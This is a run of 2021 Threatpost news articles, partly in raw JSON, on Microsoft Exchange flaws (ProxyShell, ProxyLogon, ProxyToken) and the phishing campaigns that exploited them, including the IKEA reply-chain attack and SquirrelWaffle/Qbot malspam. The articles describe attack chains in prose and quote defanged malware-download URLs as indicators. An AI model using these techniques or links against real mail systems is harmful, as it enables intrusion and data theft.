Customers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.

“But if you have not installed either of these security updates, then your servers and data are vulnerable,” according to the advisory.

The ProxyShell bugs were outlined by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers.
Microsoft said the bugs can be exploited in the following cases:

 * The server is running an older, unsupported CU;
 * The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or
 * The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.

“In all of the above scenarios, you _must_ install one of the latest supported CUs and all applicable SUs to be protected,” according to Microsoft. “Any Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.”

**Sounding the Alarm**

Following Tsai’s presentation on the bugs, the SANS Internet Storm Center’s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan, and that any threat actor worthy of that title would find exploiting them easy, given how much information is available.

Security researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6.
But starting last Friday, Huntress reported a “surge” in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.

The Cybersecurity & Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.

At the time, researcher Kevin Beaumont expressed [criticism over Microsoft’s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.

“Microsoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for – obviously – decades,” Beaumont explained.

But Beaumont said these remote code execution (RCE) vulnerabilities are “…as serious as they come.” He noted that the company did not help matters by failing to allocate CVEs for them until July — four months after the patches were issued.

In order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).

CVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to an ACL bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on the Exchange PowerShell backend.
CVE-2021-31207, a bug in which a post-auth arbitrary file write leads to remote code execution, was patched in May.

**Article:** Microsoft Breaks Silence on Barrage of ProxyShell Attacks (Threatpost, published 2021-08-26T12:39:54). Source: <https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>. CVEs: CVE-2021-31207, CVE-2021-34473, CVE-2021-34523. CVSS v3.1: 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

As of Friday – as in, shopping-on-steroids Black Friday – retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.

[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails – one of which is replicated below – that warned employees of the
attack, which was targeting the company’s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company’s suppliers and partners.

> “There is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.
>
> “This means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.” –IKEA internal email to employees.

As of Tuesday morning, the company hadn’t seen any evidence of its customers’ data, or business partners’ data, having been compromised. “We continue to monitor to ensure that our internal defence mechanisms are sufficient,” the spokesperson said, adding that “Actions have been taken to prevent damages” and that “a full-scale investigation is ongoing.”

The spokesperson said that the company’s “highest priority” is that “IKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.”

IKEA didn’t respond to Threatpost’s queries about whether the attack has been contained or if it’s still ongoing.

## Example Phishing Email

IKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company’s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits.
Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)

Example phishing email sent to IKEA employees. Source: BleepingComputer.

## Exchange Server Attacks Déjà Vu?

The attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.

As security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people’s spam suspicions and to avoid getting flagged or quarantined by email gateways.

What was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)

Malicious Microsoft Excel document.
Source: Trend Micro.

Cisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) – two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.

SquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware – typically spread via malicious emails or text messages – has been known to work.

Trend Micro’s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.

Their conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon
vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).

In the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose “Enable Content” to view a protected file, thus launching the infection chain.

Since IKEA hasn’t responded to media inquiries, it’s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to “Enable Content” or “Enable Editing” to view it.

Trend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)

Malicious Microsoft Excel document. Source: Trend Micro.

## You Can’t Trust Email from ‘Someone You Know’

It’s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads.
Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren’t necessarily legitimate and can be downright malicious.

“If you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,” she told Threatpost via email on Monday. “However, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.”

This attack is “particularly insidious,” she commented, in that it “seemingly continues a pattern of normal use.”

## No More Ignoring Quarantine

With such “normal use” patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.

Thus, IKEA’s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:

> “Our email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it’s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.” –IKEA internal email to employees.

## Is Training a Waste of Time?

With such sneaky attacks as these, is training pointless?
Some say yes, some say no.

Erich Kron, security awareness advocate at KnowBe4, is pro-training, particularly given how damaging these attacks can be.

“Compromised email accounts, especially those from internal email systems with access to an organization’s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,” he told Threatpost via email on Monday. “Because it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.

“These sorts of attacks, especially if the attackers can gain access to an executive’s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,” Kron said.

He suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message.
“If it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,” he said.

In contrast, Christian Espinosa, managing director of Cerberus Sentinel, is a firm vote for the “training is pointless” approach.

“It should be evident by now that awareness and phishing training is ineffective,” he told Threatpost via email on Monday. “It’s time we accept ‘users’ will continuously fall for phishing scams, despite how much ‘awareness training’ we put them through.”

But what options do we have? Espinosa suggested that cybersecurity defense playbooks “should focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the ‘malware’ would not be whitelisted.”

He pointed to other industries that have compensated for human factors, such as transportation. “Despite awareness campaigns, the transportation industry realized that many people did not ‘look’ before turning across traffic at a green light,” Espinosa said. “Instead of blaming the drivers, the industry changed the traffic lights.
The newer lights prevent drivers from turning across traffic unless there is a green arrow.”

This change saved thousands of lives, he said, and it’s high time that the cybersecurity industry similarly “takes ownership.”

**Article:** published 2021-11-29T21:22:12; CVSS v3.1: 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
"type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-23T00:36:02", "description": "Attackers are gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads, researchers say.\n\nWhat\u2019s still under discussion: whether the offensive is delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle is just one piece of malware among several that the campaigns are dropping.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt 
Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) – two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.

SquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware – typically spread via malicious emails or text messages – has been known to work.

## Slipping Under People’s Noses

In a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) posted on Friday, Trend Micro researchers Mohamed Fahmy, Sherif Magdy and Abdelrhman Sharshar said that hijacking email replies for malspam is a good way to slip past both people’s spam suspicions and to avoid getting flagged or quarantined by email gateways.

“Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail [gateways] will not be able to filter or quarantine any of these internal emails,” they wrote.

The attacker also didn’t drop, or use, tools for lateral movement after gaining access to the vulnerable Exchange servers, Trend Micro said. Thus, they left no tracks, as “no suspicious network activities will be detected.
Additionally, no malware was executed on the Exchange servers that will trigger any alerts before the malicious email is spread across the environment.”

## Middle East Campaign

Trend Micro’s Incident Response team had decided to look into what researchers believe are SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious Exchange server vulnerabilities.

They shared a screen capture, shown below, that’s representative of the malicious email replies that showed up in all of the user inboxes of one affected network, all sent as legitimate replies to existing threads, all written in English.

They found that other languages were used in different regions outside of the Middle East attack they examined. Still, in the intrusions they analyzed that were outside of the Middle East, most of the malicious emails were written in English, according to the report.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22101946/malicious-spam-received-by-targets-e1637594408162.png>)

Malicious spam received by targets. Source: Trend Micro.

“With this, the attackers would be able to hijack legitimate email chains and send their malicious spam as replies to the said chains,” the researchers wrote.

## Who’s Behind This?

[Cryptolaemus](<https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/>) researcher [TheAnalyst](<https://twitter.com/ffforward>) disagreed with Trend Micro on its premise that SquirrelWaffle is actually acting as a malware dropper for Qbot or other malwares. Rather, TheAnalyst asserted on Friday that the threat actor is dropping both SquirrelWaffle and Qbot as [discrete payloads](<https://twitter.com/ffforward/status/1461810466720825352>), and the most recent [confirmed SquirrelWaffle drop](<https://twitter.com/ffforward/status/1461810488870944768>) it has seen was actually on Oct.
26.

> it makes it easy for us who tracks them to identify them. A TTP they always comes back to is links to maldocs in stolen reply chains. They are known to deliver a multitude of malware like [#QakBot](<https://twitter.com/hashtag/QakBot?src=hash&ref_src=twsrc%5Etfw>) [#Gozi](<https://twitter.com/hashtag/Gozi?src=hash&ref_src=twsrc%5Etfw>) [#IcedID](<https://twitter.com/hashtag/IcedID?src=hash&ref_src=twsrc%5Etfw>) [#CobaltStrike](<https://twitter.com/hashtag/CobaltStrike?src=hash&ref_src=twsrc%5Etfw>) and maybe others.
>
> — TheAnalyst (@ffforward) [November 19, 2021](<https://twitter.com/ffforward/status/1461810468323004417?ref_src=twsrc%5Etfw>)

With regards to who’s behind the activity, TheAnalyst said that the actor/activity is tracked as tr01/TR (its QakBot affiliate ID), as [TA577](<https://twitter.com/hashtag/TA577?src=hashtag_click>) by Proofpoint and as ChaserLdr by [Cryptolaemus](<https://twitter.com/Cryptolaemus1>), and that the activity goes back to at least 2020. The actors are easy to track, TheAnalyst said, given the small tweaks to their tactics, techniques and procedures (TTPs).

One such TTP that tr01 favors is adding links to malicious documents included in stolen reply chains, TheAnalyst noted.
The threat actor is known to deliver “a multitude of malware,” they said, such as [QakBot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), [Gozi](<https://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/>), [IcedID](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), Cobalt Strike and potentially more.

## The Old ‘Open Me’ Excel Attachment Trick

The malicious emails carried links (aayomsolutions[.]co[.]in/etiste/quasnam[]-4966787 and aparnashealthfoundation[.]aayom.com/quasisuscipit/totamet[-]4966787) that dropped a .ZIP file containing a malicious Microsoft Excel sheet that downloads and executes a malicious DLL related to the [Qbot](<https://threatpost.com/ta551-tactics-sliver-red-teaming/175651/>) banking trojan.

What’s particularly notable, Trend Micro said, is that real account names from the victim’s domain were used as sender and recipient, “which raises the chance that a recipient will click the link and open the malicious Microsoft Excel spreadsheets,” according to the report.

As shown below, the Excel attachment does [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompts targets to choose “Enable Content” to view a protected file.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)

Malicious Microsoft Excel document. Source: Trend Micro.

Trend Micro offered the chart below, which shows the Excel file infection chain.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22132511/Excel_file_infection_chain__Source-_Trend_Micro_-e1637605525630.jpg>)

Excel file infection chain.
Source: Trend Micro.

## The Exchange Tell-Tales

The researchers believe that the actors are pulling it off by targeting users who are relying on Microsoft Exchange servers that haven’t yet been patched for the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) vulnerabilities.

Trend Micro found evidence in the IIS logs of three compromised Exchange servers, each compromised in a separate intrusion, all having been exploited via the vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) – the same CVEs used in ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473 and CVE-2021-34523) intrusions, according to Trend Micro.

The IIS log also showed that the threat actor is using a [publicly available](<https://github.com/Jumbo-WJB/Exchange_SSRF>) exploit in its attack. “This exploit gives a threat actor the ability to get users SID and emails,” the researchers explained. “They can even search for and download a target’s emails.”

The researchers shared evidence from the IIS logs, replicated below, that depicts the exploit code.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22125426/Exploiting-CVE-2021-26855-as-seen-in-the-IIS-logs-e1637603679782.png>)

Exploiting CVE-2021-26855, as demonstrated by the IIS logs.
Source: Trend Micro.\n\nMicrosoft fixed the ProxyLogon vulnerabilities in [March](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) and the ProxyShell vulnerabilities in [May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>). Those who\u2019ve applied the [May or July](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) updates are protected from all of these. Microsoft has [reiterated](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) that those who\u2019ve applied the ProxyLogon patch released in [March](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) aren\u2019t protected from ProxyShell vulnerabilities and should install the more recent security updates.\n\n## How to Fend Off ProxyLogon/ProxyShell Attacks\n\nExploiting ProxyLogon and ProxyShell enabled the attackers to slip past checks for malicious email, which \u201chighlights how users [play] an important part in the success or failure of an attack,\u201d Trend Micro observed. 
These campaigns \u201cshould make users wary of the different tactics used to mask malicious emails and files,\u201d the researchers wrote.\n\nIn other words, just because email comes from a trusted contact is no guarantee that any attachment or link it contains can be trusted, they said.\n\nOf course, patching is the number one way to stay safe, but Trend Micro gave these additional tips if that\u2019s not possible:\n\n * Enable virtual patching modules on all Exchange servers to provide critical level protection for servers that have not yet been patched for these vulnerabilities.\n * Use endpoint detection and response (EDR) solutions in critical servers, as it provides visibility to machine internals and detects any suspicious behavior running on servers.\n * Use endpoint protection design for servers.\n * Apply sandbox technology on email, network and web to detect similar URLs and samples.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-22T19:26:25", "type": "threatpost", "title": "Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-22T19:26:25", "id": "THREATPOST:836083DB3E61D979644AE68257229776", "href": "https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. 
To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identifies them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. 
The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, an attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. 
ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, 
targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with ProxyLogon exploits only the latest addition. 
